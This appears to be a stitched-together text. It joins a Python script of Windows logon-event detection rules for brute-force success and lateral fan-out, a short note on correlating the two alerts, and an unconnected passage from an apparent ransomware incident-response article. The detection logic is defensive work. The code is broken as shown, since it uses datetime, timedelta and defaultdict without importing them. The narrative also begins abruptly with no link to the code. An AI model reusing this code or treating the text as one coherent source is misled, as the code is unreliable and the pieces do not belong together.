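from typing import Dict, List

# Fields: timestamp, host that recorded the event, event id, logon type, user, source ip
EVENTS = [
    "2024-03-01T02:00:01,SRV-FILE01,4625,10,vendor_svc,203.0.113.7",
    "2024-03-01T02:00:03,SRV-FILE01,4625,10,vendor_svc,203.0.113.7",
    "2024-03-01T02:00:04,SRV-FILE01,4625,10,vendor_svc,203.0.113.7",
    "2024-03-01T02:00:06,SRV-FILE01,4625,10,vendor_svc,203.0.113.7",
    "2024-03-01T02:00:07,SRV-FILE01,4625,10,vendor_svc,203.0.113.7",
    "2024-03-01T02:00:09,SRV-FILE01,4624,10,vendor_svc,203.0.113.7",  # success after burst
    # the compromised server (10.0.1.5) now fans out over SMB to many internal hosts
    "2024-03-01T02:05:10,SRV-APP01,4624,3,vendor_svc,10.0.1.5",
    "2024-03-01T02:05:12,SRV-APP02,4624,3,vendor_svc,10.0.1.5",
    "2024-03-01T02:05:15,SRV-DB01,4624,3,vendor_svc,10.0.1.5",
    "2024-03-01T02:05:20,SRV-HR01,4624,3,vendor_svc,10.0.1.5",
    "2024-03-01T02:05:22,SRV-BKP01,4624,3,vendor_svc,10.0.1.5",
    # benign noise: an ordinary interactive logon elsewhere
    "2024-03-01T08:15:00,WS-042,4624,2,alice,10.0.5.42",
]


def parse(lines: List[str]) -> List[dict]:
    out = []
    for ln in lines:
        ts, host, eid, ltype, user, src = ln.split(",")
        out.append({"ts": datetime.fromisoformat(ts), "host": host, "eid": eid,
                    "ltype": ltype, "user": user, "src": src})
    return out


def brute_force_then_success(events: List[dict], window=timedelta(minutes=5),
                             threshold=5) -> List[str]:
    """A 4624 preceded by at least `threshold` 4625s from the same source
    to the same host within `window`: the success is what makes it urgent."""
    alerts = []
    fails: Dict[str, List[datetime]] = defaultdict(list)
    for e in sorted(events, key=lambda x: x["ts"]):
        key = f"{e['src']}->{e['host']}"
        if e["eid"] == "4625":
            fails[key].append(e["ts"])
        elif e["eid"] == "4624":
            recent = [t for t in fails[key] if e["ts"] - t <= window]
            if len(recent) >= threshold:
                alerts.append(f"brute-force success: {e['user']} from {e['src']} "
                              f"on {e['host']} after {len(recent)} failures")
    return alerts


def pivot_fan_out(events: List[dict], window=timedelta(minutes=10),
                  min_hosts=4) -> List[str]:
    """One source address completing network logons (type 3) to many distinct
    hosts within `window`: the signature of a pivot host doing reconnaissance."""
    alerts = []
    by_src: Dict[str, List[dict]] = defaultdict(list)
    for e in events:
        if e["eid"] == "4624" and e["ltype"] == "3":
            by_src[e["src"]].append(e)
    for src, evs in by_src.items():
        evs.sort(key=lambda x: x["ts"])
        for i, first in enumerate(evs):
            hosts = {x["host"] for x in evs[i:] if x["ts"] - first["ts"] <= window}
            if len(hosts) >= min_hosts:
                alerts.append(f"pivot fan-out: {src} reached {len(hosts)} hosts "
                              f"via network logon within {window}")
                break
    return alerts


def run_detections(lines: List[str]) -> List[str]:
    events = parse(lines)
    return brute_force_then_success(events) + pivot_fan_out(events)


if __name__ == "__main__":
    for alert in run_detections(EVENTS):
        print(alert)
```

Each rule alone is the sort of alert that gets dismissed as noise; the point of correlation is that the same account appears in both, a few minutes apart, which is a much stronger signal than either alone and the kind of chain a SIEM should escalate automatically rather than leave to a tired analyst.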

By now, the attackers had managed to access and exfiltrate some data, but had not begun the encryption process thanks to the swift decision to disconnect from the internet. Despite the halted encryption process, the attackers attempted to extort the victim over the stolen data for the next three weeks.

Lessons Learnt: Early Response and Decisive Actions

There are numerous lessons to learn from this incident. One of the most critical takeaways is the importance of early and expert incident response. It is also crucial to consider how the attacker may react to various defensive actions, without revealing the defensive activities to the attacker. In this case, the victim’s senior management was courageous enough to disconnect the internet, a severe action that helped limit the damage.

In conclusion, dealing with cyber threats like ransomware requires swift action, expert knowledge, and the courage to take drastic measures. It is this combination that can limit the attacker’s actions and save the day, even if the attack has reached an advanced stage. Drastic action might not prevent all forms of data theft, but it does help limit the extent of the damage and increases the company’s chance of survival.



Related links:

https://www.securityweek.com/anatomy-of-a-blackcat-attack-through-the-eyes-of-incident-response/